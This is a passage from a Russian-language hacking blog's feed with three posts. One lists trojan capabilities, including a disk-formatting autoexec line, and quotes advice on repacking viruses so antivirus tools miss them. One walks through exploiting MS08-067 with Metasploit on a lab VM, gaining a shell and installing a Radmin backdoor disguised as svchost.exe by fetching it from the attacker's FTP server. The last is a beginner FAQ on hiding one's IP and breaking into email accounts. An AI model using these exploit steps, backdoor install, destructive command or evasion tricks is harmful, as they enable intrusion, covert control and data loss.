некриптостойкими алгоритмами, в частности за"XOR"иванием. Такое кодирование вскрывается за доли секунды, в отличие от метода кодирования паролей в UNIX-системах, где вскрыть пароль можно только прямым перебором, да и то при достаточно большой вычислительной можности перебор всех вариантов одного пароля займет в среднем 12 тысяч лет.&lt;br /&gt;&lt;br /&gt;Но самое примечательное - это то, что в плане атак по сети WINDOWS просто полностью открыта! Есть немало программ, которые посылая несколько байтов по сети на компьютер-жертву, заставляют его зависнуть или перезагрузиться. В народе по этому поводу проскакивают такие слова, как "Nuke", "Ping Flood", "TearDrop" и много чего еще. Об этих атаках много уже написано статей, обзоров, уже существует достаточное количество "заплаток", и если грамотно воспользоваться этим, то можно себя более-менее обезопасить.&lt;br /&gt;&lt;br /&gt;Но существует такой изощренный способ атак, что большинство людей перед ними бессильны. Что это? Можно сказать одним словом - ТРОЯНЫ.&lt;br /&gt;&lt;br /&gt;Трояны - что это такое? Чем они отличаются от вирусов, как распространяются, какой вред они могут принести?&lt;br /&gt;&lt;br /&gt;Само определение "Троян", или "Троянский конь" появилось по аналогии с мифическим конем, то есть снаружи это красивая вещь, а внутри спрятано что-то нехорошее. Что именно? Про все трояны ничего конкретного сказать нельзя, можно лишь отметить, что от вирусов они отличаются тем, что зачастую управляются человеком, сидящим "на другом конце провода". Это в том случае, если ваш компьютер подключен к Интернет. Отсутствие подключения зачастую сводит на нет все усилия троянов. Данные программы могут не иметь деструктивных функций. Их назначение иное - извлекать информацию, несанкционированно изменять ее, а также иметь полный контроль над компьютером, настолько полный, что даже человек, сидящий не посредственно за ним, не может так всеобъемлемо управлять этим теперь уже непредсказуемым "ящиком".&lt;br /&gt;&lt;br /&gt;Итак, что же из себя представляет программа-троян? А ничего особенного, даже начинающий программист способен ее написать. Принцип основан на том, что программа является одной из задач Windows, как правило, невидимой по Ctrl-Alt-Del. Программа-троян "слушает" порты (это то, благодаря чему существует соединение по сети, портов может быть до 65535. Например, ftp-сервер слушает 21 порт, web-сервер, как правило, 80 порт, почтовый сервер - порт 25 для отправки и порт 110 для приема почты), и когда на определенный порт приходит пакет данных, программа-троян исполняет пришедшие команды.&lt;br /&gt;&lt;br /&gt;Для трояна ничего не стоит выцепить любой закешированный пароль к любому из ресурсов, перехватывать нажатие клавиш на вашей клавиатуре...&lt;br /&gt;&lt;br /&gt;Ниже я приведу далеко не полный список функций, выполняемых троянами. Вы представьте сразу, что эти действия выполняются на вашей машине. Итак, начнем...&lt;br /&gt;&lt;br /&gt;Доступ к дискам. Можно копировать, стирать файлики... Все файловые операции, то есть. Ничего не стоит прочитать вашу почту, которая уже получена и хранится в файле "Inbox", или поправить autoexec.bat, вписав туда строчку "echo y|format c:&gt;nul", благодаря которой при перезагрузке жесткий диск будет безо всяких вопросов отформатирован.&lt;br /&gt;&lt;br /&gt;Перехват клавиатуры. Вот он, ваш парольчик-то... Кража закешированных паролей (тех, что "запоминаются" системой). Вот все пароли сразу...&lt;br /&gt;&lt;br /&gt;Сбор информации о системе (какой логин, сколько памяти, диски, принтеры...)&lt;br /&gt;&lt;br /&gt;Получение копии вашего экрана. Без комментариев.&lt;br /&gt;&lt;br /&gt;Запрещение нажатий определенных клавиш на клавиатуре. (Издевательство.)&lt;br /&gt;&lt;br /&gt;Поменять кнопки мышки местами. (Тоже издевательство.)&lt;br /&gt;&lt;br /&gt;Контроль координат курсора мыши (ой, мышка сама ездит???)&lt;br /&gt;&lt;br /&gt;Открыть/закрыть CD-ROM. (Оооочень забавно...)&lt;br /&gt;&lt;br /&gt;Или вообще блокировать кнопку "Eject" на нем... (CD-ROM сломался!!!)&lt;br /&gt;&lt;br /&gt;Перенаправление консоли (то есть как telnet, только например, command.com запустился у вас, а на экран он вышел не у вас... А тот человек набрал команду "format c:" и нажал "y"...)&lt;br /&gt;&lt;br /&gt;Перенаправление портов. Это еще серьезней. Злоумышленник будет ломать банк, Белый Дом, спутники... А ФБР или ФСБ почему-то придет к вам... То есть, сигнал пойдет от злоумышленника через ваш компьютер, и везде засветится именно ваш IP-адрес...&lt;br /&gt;&lt;br /&gt;Узнать, какие программы у вас запущены.&lt;br /&gt;&lt;br /&gt;Закрыть парочку этих программ (например, пасьянс у секретарши или Word у профессора...)&lt;br /&gt;&lt;br /&gt;Запустить программу (вот вам калькулятор, считайте на здоровье. Или еще один, новый троян, которого антивирусы не видят.)&lt;br /&gt;&lt;br /&gt;Вывести на экран картинку (порно, в то время, когда у начальника важный посетитель.)&lt;br /&gt;&lt;br /&gt;Показать/убрать панель задач (вот весело-то, кнопки Пуск нет... часов нет...)&lt;br /&gt;&lt;br /&gt;Выключить или перезагрузить компьютер. (Без комментариев.)&lt;br /&gt;&lt;br /&gt;Отключить компьютер от Интернета. (Пусть перезагружается, чтоб снова работать)&lt;br /&gt;&lt;br /&gt;Если у вас подключен микрофон, то можно услышать вас.&lt;br /&gt;&lt;br /&gt;Если у вас есть Web-Camera, то можно и увидеть вас.&lt;br /&gt;&lt;br /&gt;Если у вас слишком громко играет музыка, то можно ее вам убавить.&lt;br /&gt;&lt;br /&gt;Или наоборот, проиграть на вашей машине звуковой файл...&lt;br /&gt;&lt;br /&gt;А можно и документ на вашем принтере напечатать. Можно подредактировать ваш реестр. Там хранятся ВСЕ настройки... Что "настройщику" придет в голову, неизвестно.&lt;br /&gt;&lt;br /&gt;Можно диалоговые окошки выводить. Вот такие, например...&lt;br /&gt;&lt;br /&gt;Иногда полезно бывает открыть вам броузер и "послать" вас например, на www.fuck.ru. Вам должно понравиться. Особенно если вы человек высокой морали.&lt;br /&gt;&lt;br /&gt;Можно вывести окошко, в котором вы обычно набираете пароль... 90 %, что вы наберете его. Это может быть пароль от почты, от ICQ или еще от чего-нибудь. Последствия известны...&lt;br /&gt;&lt;br /&gt;Можно посмотреть, что вы там через буфер обмена носите. А может, там пароль???&lt;br /&gt;&lt;br /&gt;В конце концов, можно стереть у вас содержимое Flash-BIOS. Последствия будут, как от вируса "Чернобыль" (Win.CIH).&lt;br /&gt;&lt;br /&gt;Можно с машины-жертвы просканировать порты, например, на сервере... Вот админ сервера удивится, когда начальник, ничего в этом не понимающий, засветит свой IP в логах...&lt;br /&gt;&lt;br /&gt;Можно переименовать заголовки окон, например, "WinWord" в "Привет от Васи Пупкина"... Человек будет в трансе...&lt;br /&gt;&lt;br /&gt;Можно текст вам переслать, как будто вы его сами на клавиатуре набрали. (Клавиатура с ума сошла!!!)&lt;br /&gt;&lt;br /&gt;Время на компьютере изменить - тоже не проблема. Особенно опасным может быть такая комбинация: закачать вам на диск вирус "Чернобыль" (Win.Cih), изменить время на 26 апреля, запустить этот файл, с полчасика подождать и перезагрузить вас.&lt;br /&gt;&lt;br /&gt;Ваш компьютер может посылать каждый раз при включении почту злоумышленнику, сообщая о времени включения и о других параметрах.&lt;br /&gt;&lt;br /&gt;А также в некоторых троянах есть функция самоликвидирования, то есть при грамотном использовании их можно нанести очень большой урон и замести практически все следы деятельности, так что доказательств не останется.&lt;br /&gt;&lt;br /&gt;Вот такие пироги... Это далеко не полный список. Это всего лишь то, что я вспомнил "с лету". Подытоживая все это, хочу сказать, что контроль над компьютером таким образом осуществляется АБСОЛЮТНО ПОЛНЫЙ. Насколько полный - зависит от конкретного трояна и от фантазии его создателей. Прогресс идет...&lt;br /&gt;&lt;br /&gt;Вот моя точка зрения, как дальше будут развиваться трояны:&lt;br /&gt;&lt;br /&gt;1. Насчет обнаруживаемости антивирусами... Ну, тут вряд ли что-то изменится, концепция известна давно. Спустя некоторое время после попадания вредной программы в руки антивирусописателей, на многих компьютерах часы данной программы сочтены.&lt;br /&gt;&lt;br /&gt;2. Насчет расположения... Классический троян при запуске копирует себя в директорию Windows, например, и прописывает в реестр строку старта. Или это делается в файлах system.ini, win.ini и им подобных. Этот способ обнаружения знают многие, в таком случае даже антивируса или каких-то дополнительных программ не надо. Достаточно стандартного REGEDIT'а, или MSCONFIG (им-то я и пользуюсь). Новые поколения троянов скорее всего, будут внедряться по вирусному типу (а есть уже такие) в системные библиотеки. Таким образом, нигде не будет видна стартовая строка трояна.&lt;br /&gt;&lt;br /&gt;3. Кстати, есть такое понятие, как "ловушки", то есть программы, перехватывающие нажатия клавиш на клавиатуре. Типичная стандартная Виндовая "ловушка", по определению одной из программ, показывающих информацию о системе - это "INTERNAT.EXE", та программа, которай отслеживает нажатия "Alt+Shift" или "Ctrl+Shift" (переключение с русского языка на английский), и показывающая в System Tray (около часов) иконку "Ru" или "En" соответственно. А есть и другие "ловушки", например достаточно широко распространенная программа "HookDump", которая логает (записывает в файл) не только нажатия клавиш, но и заголовок окна программы, в которой эти клавиши набирались, а также время, нажатия кнопок мыши и кое-что еще. Отрадно? Если всего этого не знать, то можно стать жертвой не то что профессионального хакера, а просто человека, возомнившего себя им, т.е. "псевдохакера" (или ламера, что еще хуже). Из всего этого вытекает. что троянец лучше всего внедрять в INTERNAT.EXE (а может, и еще кое-куда), т.к. кое-какие нужные функции эта программа уже выполняет.&lt;br /&gt;&lt;br /&gt;4. Двигаемся дальше... Известно, что если компьютер находится за прокси-сервером, Firewall'ом или чем-то подобным, то опасность вторжения извне на этот компьютер снижается на несколько порядков. Но ничто не мешает сделать такой троян, который бы использовал стандартный WWW-интерфейс, то есть делал бы то же, что и пользователь - шел бы на указанный заранее WWW-адрес, например обращался бы к файлу http://www.vasja_pupkin.mil/command.cmd, в котором содержались бы команды типа "GET FILETREE", которые необходимо выполнить. Затем результаты отправлялись бы на адрес vasja@pupkin.mil, прочитав которые, злоумышленник запоимеет все, что ему надо. Как защититься от такого способа? Ведь если закрыть порты, как это делалось, например, с BackOrifice (блокация порта 31337, и нет проблем), то пользователь не сможет читать/отправлять почту, заниматься WEB-серфингом... То есть это есть потеря главной функции, к которой прицепился троян. Пока таких продуктов в широком употреблении нет, но я уверен, что они уже существуют.&lt;br /&gt;&lt;br /&gt;5. В настоящее время есть много программ, который позволяют зашифровать и/или заархивировать исполняемый файл так, что антивирусы не смогут его обнаружить. Например, если рассмотреть старый DOSовый вариант самораспаковывающихся программ при их исполнении: цитирую первый номер хакерского журнала "Infected Voice":&lt;br /&gt;&lt;br /&gt;"Подготовка вируса к распространению.&lt;br /&gt;1. Как скрыть скомпрессированный файл&lt;br /&gt;2. Как дважды скомпрессировать файл&lt;br /&gt;&lt;br /&gt;1. Скрывая подготовленные к распространению вирусы в файле, заПыколотив (PKLITE) или заЛзексив их (LZEXE), хотя бы с опцией ExtraCompression, никогда нет уверенности в том, что та или иная задница (DR. WEB), увидев лейбл LZ или PKLITE, не полезет туда с целью выПЫколотить оригинальчик. Здесь предлагаются некоторые методы по защите от этого.&lt;br /&gt;&lt;br /&gt;Конечно, для начала вы скомпрессируете ваш файл чем-нибудь типа PkLite или LZexe, и даже с опцией Extra Compression. Готово? Нет - это еще не все. Загрузите-ка этот файл в HEX-editor и посмотрите в начало:&lt;br /&gt;&lt;br /&gt;Виден заголовок? "PKLITE Corp."... Забейте мусором все от "PKLITE... до ...Rights Reserved" , а также извратите до неузнаваемости надпись "Not enough memory", забейте ее нулями, (или символами 07 -вот пищать будет!) или чем-нибудь еще, но помните, что это г... будет выводиться на экран при нехватке памяти. Не трогайте '$'! Не забивайте эти участки текстом - это будет заметно.&lt;br /&gt;&lt;br /&gt;Итак, теперь ваш файл - неразжимаем с помощью утилит - непонятен для глаза - непроверяем фаКами(тупейшие программы!),- теми из них, которые имеют наглость лезть файлам под одежду PkLite'вского производства.&lt;br /&gt;&lt;br /&gt;Ну и, конечно, не стоит заражать файл вирусом в чистом виде. Лучше напишите инсталлятор, который сделает это не сразу.&lt;br /&gt;&lt;br /&gt;2. Сейчас я расскажу вам, как скомпрессировать файл два раза:&lt;br /&gt;- один раз - Pklite'ом&lt;br /&gt;- второй раз - LZExe&lt;br /&gt;&lt;br /&gt;Что тут неясного - откомпрессить файл Pklite'ом, потом Lzexe... Нате вам дулю - Lzexe не напишет что-то типа "ужат на минус 5%", он просто не даст вам такого сделать ваще! А теперь вы ему дулю - посмотрите, что там у нас в текущем каталоге, хорошо посмотрите, - Undelet'oм. хZEXE.TMP. Восстановим LZEXE.TMP - это и есть дважды обработанный файл. Переименовываем его в то, что нам надо. Дальше см. п.5.1."&lt;br /&gt;&lt;br /&gt;Конец цитаты... Впечатляет? Как говорится, все гениальное просто. И от DOSа до WINDOWSа в этом смысле всего лишь один шаг. Антивирус не сможет обнаружить сигнатуру вируса, это сможет сделать только человек. В смысле, не обнаружить сигнатуру, а обнаружить наличие вируса на компьютере. Как - это уже другой вопрос, и он рассматривается в другой моей статье.&lt;br /&gt;&lt;br /&gt;Елесин Д.Е.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-4945496762098263276?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/4945496762098263276/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=4945496762098263276' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/4945496762098263276'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/4945496762098263276'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/03/blog-post_20.html' title='Что такое трояны?'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-849896742328835236</id><published>2009-03-17T03:06:00.000-07:00</published><updated>2009-03-17T03:07:43.090-07:00</updated><title type='text'>ВЗЛОМ ПК, под управлением Windows.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.intelliadmin.com/images/Windows%202000%20Screen%20Shot.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 436px; height: 305px;" src="http://www.intelliadmin.com/images/Windows%202000%20Screen%20Shot.jpg" border="0" alt="" /&gt;&lt;/a&gt;#ВЗЛОМ ПК, под управлением Windows. #&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;КЛАССИФИКАЦИЯ АТАК.&lt;br /&gt;&lt;br /&gt;Атаки на протокол&lt;br /&gt;Атаки на ПО&lt;br /&gt;Атаки на пользователя&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ПОЛИГОН ДЛЯ ИСПЫТАНИЙ.&lt;br /&gt;&lt;br /&gt;Необходимый софт:&lt;br /&gt;Любой дистрибьютив Windows XP (SP2,SP3 )&lt;br /&gt;Виртуальная машина Vmware.&lt;br /&gt;&lt;br /&gt;Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем.&lt;br /&gt;&lt;br /&gt;Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум инструкциям, там все интуитивно понятно. Теперь идем в Edit =&gt; Virtual Network Setting и переходим на вкладку Host Virtual Adapter&lt;br /&gt;&lt;br /&gt;http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_sPqVgrSI/AAAAAAAAABU/mbkjmgkOPZw/s1600-h/4.JPG&lt;br /&gt;&lt;br /&gt;Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому&lt;br /&gt;&lt;br /&gt;http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_sYkHlZUI/AAAAAAAAABc/qjfM2pZ377g/s320/6.JPG&lt;br /&gt;&lt;br /&gt;адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически.&lt;br /&gt;Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2.&lt;br /&gt;&lt;br /&gt;http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tAviI_NI/AAAAAAAAABk/9KgaPlft3Vg/s320/7.JPG&lt;br /&gt;&lt;br /&gt;Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод.&lt;br /&gt;&lt;br /&gt;http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_tPG8Z0HI/AAAAAAAAABs/VhLjeTEXL3U/s320/8.JPG&lt;br /&gt;&lt;br /&gt;Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD.&lt;br /&gt;&lt;br /&gt;http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tbjgIAiI/AAAAAAAAAB0/lDyNMxBWq5g/s320/9.JPG&lt;br /&gt;&lt;br /&gt;#УСТАНОВКА СВЯЗИ.#&lt;br /&gt;&lt;br /&gt;Необходимый софт:&lt;br /&gt;ФТП — сервер (Serv -U)&lt;br /&gt;&lt;br /&gt;Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2.&lt;br /&gt;&lt;br /&gt;http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_t-0smY_I/AAAAAAAAAB8/gfPFPI4pUD8/s400/11.JPG&lt;br /&gt;&lt;br /&gt;IP адресс 192.168.1.3&lt;br /&gt;Маска подсети 255.255.255.0&lt;br /&gt;&lt;br /&gt;Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip.&lt;br /&gt;&lt;br /&gt;http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_uM38r_JI/AAAAAAAAACE/1rMp4pVRuhc/s400/10.JPG&lt;br /&gt;&lt;br /&gt;Настраиваем следующим образом:&lt;br /&gt;&lt;br /&gt;IP адресс 192.168.1.10&lt;br /&gt;Маска подсети 255.255.255.0&lt;br /&gt;Основной шлюз 192.168.1.3&lt;br /&gt;&lt;br /&gt;Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП.&lt;br /&gt;&lt;br /&gt;http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_ueYAqsjI/AAAAAAAAACM/nM1W9kgxHBY/s400/12.JPG&lt;br /&gt;&lt;br /&gt;#ПРИМЕР.#&lt;br /&gt;&lt;br /&gt;Необходимый софт:&lt;br /&gt;&lt;br /&gt;Metasploit 3.2&lt;br /&gt;Radmin Viewer 3&lt;br /&gt;RadminServer (спец. Сборка)&lt;br /&gt;&lt;br /&gt;Сканим комп xspider'ом&lt;br /&gt;&lt;br /&gt;http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_5nXMqGLI/AAAAAAAAACs/TZRNc3_wzlA/s400/16.JPG&lt;br /&gt;&lt;br /&gt;Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555.&lt;br /&gt;&lt;br /&gt;http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_uwjg_pzI/AAAAAAAAACU/r3l9-k44ksE/s400/13.JPG&lt;br /&gt;&lt;br /&gt;use windows/smb/ms08_067_netapi ; наш сплоит&lt;br /&gt;&lt;br /&gt;set PAYLOAD generic/shell_bind_tcp ; выбираем начинку&lt;br /&gt;&lt;br /&gt;PAYLOAD =&gt; generic/shell_bind_tcp&lt;br /&gt;&lt;br /&gt;set RHOST 192.168.1.10 ; хост-жертва&lt;br /&gt;&lt;br /&gt;RHOST =&gt; 192.168.1.10&lt;br /&gt;&lt;br /&gt;set LPORT 7777 ; локальный порт&lt;br /&gt;&lt;br /&gt;LPORT =&gt; 7777&lt;br /&gt;&lt;br /&gt;set RPORT 445 ; удаленный порт&lt;br /&gt;RPORT =&gt; 445&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;exploit&lt;br /&gt;[*] Started bind handler&lt;br /&gt;[*] Automatically detecting the target...&lt;br /&gt;[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian&lt;br /&gt;[*] Selected Target: Windows XP SP3 Russian (NX)&lt;br /&gt;[*] Triggering the vulnerability...&lt;br /&gt;[*] Command shell session 1 opened (192.168.1.3:5583 -&gt; 192.168.1.10:7777)&lt;br /&gt;&lt;br /&gt;Microsoft Windows XP [‚¥àá¨ï 5.1.2600]&lt;br /&gt;(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.&lt;br /&gt;&lt;br /&gt;C:WINDOWSsystem32&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Получили командную строку на удаленной системе&lt;br /&gt;&lt;br /&gt;{создаем в папке windows, папку helps}&lt;br /&gt;cd c:windows&lt;br /&gt;mkdir helps&lt;br /&gt;&lt;br /&gt;{коннектимся к нашему компу}&lt;br /&gt;ftp192.168.1.3&lt;br /&gt;Пользователь (192.168.1.3:(none)): kerny&lt;br /&gt;&lt;br /&gt;{успешный коннект, идем c:kerny нашего фтп, именно там хранится радмин}&lt;br /&gt;cd c:kerny&lt;br /&gt;dir&lt;br /&gt;&lt;br /&gt;{файлы радмина}&lt;br /&gt;drw-rw-rw- 1 user group 0 Mar 2 20:10 .&lt;br /&gt;drw-rw-rw- 1 user group 0 Mar 2 20:10 ..&lt;br /&gt;-rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat&lt;br /&gt;-rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg&lt;br /&gt;-rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll&lt;br /&gt;-rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll&lt;br /&gt;-rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe&lt;br /&gt;&lt;br /&gt;{сливаем файлы на комп жертвы в папку windowshelps}&lt;br /&gt;get 111.bat c:windowshelps111.bat&lt;br /&gt;get 111.reg c:windowshelps111.reg&lt;br /&gt;get AdmDll.dll c:windowshelpsAdmDll.dll&lt;br /&gt;get raddrv.dll c:windowshelpsraddrv.dll&lt;br /&gt;get svchost.exe c:windowshelpssvchost.exe&lt;br /&gt;{отключаемся от нашего фтп}&lt;br /&gt;bye&lt;br /&gt;&lt;br /&gt;{идем в папку, и проверяем скачались ли файлы}&lt;br /&gt;cd c:windowshelps&lt;br /&gt;dir&lt;br /&gt;-rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat&lt;br /&gt;-rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg&lt;br /&gt;-rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll&lt;br /&gt;-rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll&lt;br /&gt;-rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe&lt;br /&gt;&lt;br /&gt;{устанавливаем Radmin у жертвы}&lt;br /&gt;111.bat&lt;br /&gt;&lt;br /&gt;http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_weqnkS1I/AAAAAAAAACc/de-qr4zW1Xo/s400/14.JPG&lt;br /&gt;&lt;br /&gt;Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно.&lt;br /&gt;&lt;br /&gt;http://2.bp.blogspot.com/_oxXdxKIGwp0/Sa_wqRwzH3I/AAAAAAAAACk/A7Xi7UIkWaE/s400/15.JPG&lt;br /&gt;&lt;br /&gt;Снял видео, там же и статья отформатированная в pdf:&lt;br /&gt;http://ifolder.ru/10884195&lt;br /&gt;http://kerny-auroras.blogspot.com/2009/03/windows.html&lt;br /&gt;&lt;br /&gt;Удачи!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-849896742328835236?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/849896742328835236/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=849896742328835236' title='1 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/849896742328835236'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/849896742328835236'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/03/windows.html' title='ВЗЛОМ ПК, под управлением Windows.'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-8818918181738236243</id><published>2009-03-13T04:25:00.000-07:00</published><updated>2009-03-13T04:28:56.105-07:00</updated><title type='text'>Вопросы новичков, новичкам.</title><content type='html'>Это мануал для новичков, так сказать потому что у начинающих очень много общих вопросов, на которые иногда действительно надоедает отвечать! Я надеюсь что в этой статье я соберу самые часто задаваемые вопросы, и постораюсь ответить на все они! А также, буду ориентироватся на помощь новичкам а именно помогу немного разобратся в этот большой и не простой мир хакерства) Для удобности я разделю эту статью на части так как хакерство тоже имеет несколько направлений, а новичкам это будет сложно разберать всё что ему нужно из то что есть) Сегодня поговорим и помогу тем что хотят занятся или нуждаются в взломе и защите. По моему лучше разделить всё ниже представленное на : Часто задаваемые вопросы, Общее образование, Вирусалогия и конечно же Безопастность! Я выбрал именно эти категории так как это самые уязвимые части новичков! Все материалы и статьи ниже представленные с статье, находятся на нашем сайте www.whack.ru Это первая часть статьи. Продолжение следует)!&lt;br /&gt;&lt;br /&gt;Часто задаваемые вопросы!&lt;br /&gt;И итак, поговорим о часто задаваемых вопросах! На нашем сайте www.whack.ru&lt;br /&gt;"- С чего начать? - Прочитайте эту статью, и многое станет ясным! Так же проходим квесты сайта, это много влеяет на ваше умение!"&lt;br /&gt;"- Как сменить/скрыть айпи компютера? - Вам поможет прокси серверы! О них читайте чуть ниже!"&lt;br /&gt;"-Как взломать е-майл? - Есть метод СИ и брутфорсер! О них читайте ниже!"&lt;br /&gt;"-Забыл пароль на аську, что делать? - Пользуйтесь системой востановления пароля! Вам нужно только задать тот е-майл который был при регистрации или который сидит в аське! Пройдя всё что сказано на сайте, вы смените пароль на новый!"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Общее образование&lt;br /&gt;Под терменом Общее образование я решил ставить всё что по моему должен каждый знать, вне зависимости от уровня и умения хакерства! Начать с того что такое Интернет будет глупо, так как все это знают, и кстате, щас вы читаете этот мануал через Интернет) Но я уверен что не все знают что такое порты и для чего они или как правельно искать и юзать прокси! По моему, каждый начинающий хакер должен знать хорошо что такое ip и как можно его использовать, независимо от целях! И так, поговорим в начале немного о айпи) IP это адрес компютера или сервера подключенного к Интернету. Он выглядит примерно так: 212.64.79.57. Каждый подключенный к интернету компютер имеет свой уникальный айпи адрес, и он не может быть у другово компютера одновременно! Но вы спросите: а какже быть с айпи адресами которые я видел у себя и на следующий день у друга? Дело в том что все айпи адреса разделяются на две стороны а именно: статистический айпи и меняющейся. Статистические айпи или так сказать выделенные можно иметь только если купить! Они не меняются когда вы заходите в сети. А меняющейся айпишки, они доступны для всех, и таким образом, при каждом входе в Интернет у вас будет другой айпи, хотя бывает что два, три раза под ряд может быть один и тот же айпи. Спросите вы, а что с того что мы знаем про айпи? ГЫ, все удалённые атаки начинаются от айпи адреса, то есть локализации вашей цели. Если не знать айпи цели, ни какой атаки и не может быть! Ну а если спросите как же узнать айпи, то отвечу так: есть онлайн сниферы. Если человек кликнет на ссылку под которым скрывается снифер, вы узнаете его айпи 100% Но если чел будет сидеть через прокси, тогда будет по сложней! По подробней о IP можно читать и учить http://forum.whack.ru/showthread.php?t=728 Про снифферах скожу только одно. Самые простые снифферы способны определить айпи адреса и провайдер, ну а снифферы по сложней, могут красть очень много данных! Подробней о снифферах можно читать http://forum.whack.ru/showthread.php?t=729 Дальше поговорим о прокси. Напоминаю что прокси это одна из очень необходимых утилит для хакера, особенно при атаках! Прокси это промежуточный компютер к которому вы соединяетесь. Дальше, когда вы даёте запросы, они посылаются не сразу к ресурсу (пр. к сайту которому, вам нужна посмотреть фото). Ваш запрос будет в начале отправлен к данному проски серверу(компютеру), он выполняет ваш запрос, получает ответ и посылает его вам обратно в готовом виде)) Таким образом, выходит что этот прокси сервер делает всё за вас. Это скрывает ваш настоящий айпи адрес, и при атаках, вас будет на много сложней вычеслить!! Как искать найти прокси? На нашем форуме: www.forum.whack.ru есть специальный раздел где каждые два три дня выкладываются новые прокси! Также можно юзать программы для прокси. Одна из самых простых это Hide IP. Скачать её можно www.singlewire.110mb.com/hideip.rar После установки и запуска, данная программа сама начнёт искать пркси сервер. Также в ручную можно юзать прокси. Для этого берём рабочий прокси и вставляем в браузер. Скажу что один из лучших и стабильных браузеров это Opera! Это можно делать если поковырятся в настройках браузера. Для оперы нужно Ctrl+F12 - Дополнительно - Сеть - Прокси-серверы и втавляем 